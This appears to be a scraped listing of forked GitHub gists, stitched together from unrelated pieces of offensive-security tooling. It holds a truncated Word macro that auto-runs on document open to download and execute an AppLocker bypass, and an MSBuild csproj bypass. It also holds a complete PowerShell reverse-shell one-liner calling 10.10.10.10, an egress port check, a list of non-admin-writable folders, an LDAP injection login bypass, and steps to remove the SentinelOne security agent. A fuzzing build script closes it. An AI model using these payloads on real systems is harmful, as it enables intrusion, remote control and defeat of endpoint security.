@nani1337
nani1337 / macro_download_and_execute_msbuild_csproj_powershell.vba
Created December 21, 2022 00:34 — forked from egre55/macro_download_and_execute_msbuild_csproj_powershell.vba
macro - download and execute applocker bypass (msbuild / csproj / powershell)
' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' powashell.csproj by @SubTee
' https://gist.github.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0
Sub Document_Open()
Dim WinHttpReq As Object
Dim oStream As Object
Dim myURL As String
@nani1337
nani1337 / powashell.csproj
Created December 21, 2022 00:34 — forked from egre55/powashell.csproj
powashell.csproj by Casey Smith @subTee
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
@nani1337
nani1337 / egress_check.ps1
Created December 21, 2022 00:34 — forked from egre55/egress_check.ps1
egress check one-liner
# Ugly PowerShell egress check one-liner (works in Constrained Language Mode)
# NMap top 50 ports. Checking > 50 may cause Memory DoS
foreach ($i in 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154){Start-Job -ScriptBlock {param($i) & Test-NetConnection -ComputerName 10.10.10.10 -Port $i} -ArgumentList $i} Get-Job | Wait-Job | Get-Job | Receive-Job
## locations writable by non-admin users in Windows (Windows 10)
# default folders
C:\$Recycle.Bin\<USER SID> (whoami /user)
C:\Users\All Users (links to C:\ProgramData)
C:\PerfLogs
C:\ProgramData
C:\Windows\Tasks
C:\Windows\tracing
@nani1337
nani1337 / powershell_reverse_shell.ps1
Created December 21, 2022 00:31 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$ curl "william:password@localhost:9080/login"
Login failed
By exploiting the LDAP injection, we bypass the LDAP filter constraint and are successfully signed in:
$ curl "william))(&(abc=:password@localhost:9080/login"
WSPrincipal:uid=william,cn=users,dc=my-company,dc=com
@nani1337
nani1337 / README.md
Created February 24, 2022 10:58 — forked from nwade/README.md
Remove SentinelOne Agent - macOS High Sierra/Mojave

Warning - use at your own risk

Remove SentinelOne agent from Mac

  1. Boot into Recovery Mode by holding Cmd+R during reboot
  2. Open Terminal from top menubar
  3. Run /Applications/Utilities/Disk\ Utility.app/Contents/MacOS/Disk\ Utility to open Disk Utility
  4. If your startup disk is encrypted, use Disk Utility to mount it
  5. In Terminal, run chroot /Volumes/Macintosh\ HD
  6. Execute the deletion commands or script
@nani1337
nani1337 / winafl-setup.md
Created November 4, 2021 04:56 — forked from insi2304/winafl-setup.md
How to setup winafl on Windows 10
@nani1337
nani1337 / cmake_build.sh
Created November 4, 2021 04:36 — forked from insi2304/cmake_build.sh
cmake AFL build
#!/bin/bash
# Configure a CMake project to build with AFL's clang wrappers plus ASan/UBSan
# instrumentation; the original one-liner is split across lines for readability
# and the missing leading "-" on -DCMAKE_INSTALL_PREFIX is fixed.
cmake \
  -DCMAKE_C_COMPILER=afl-clang-fast \
  -DCMAKE_CXX_COMPILER=afl-clang-fast++ \
  -DCMAKE_CXX_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all -g" \
  -DCMAKE_C_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all -g" \
  -DCMAKE_EXE_LINKER_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all" \
  -DCMAKE_INSTALL_PREFIX=/home/fuzz/fuzzing/xpdf-4.03/install/ \
  -DCMAKE_MODULE_LINKER_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all" \
  -DCMAKE_BUILD_TYPE=Debug,ASAN,UBSAN \
  -DWITH_SSE2=ON \
  -DMONOLITHIC_BUILD=ON \
  -DBUILD_SHARED_LIBS=OFF \
  .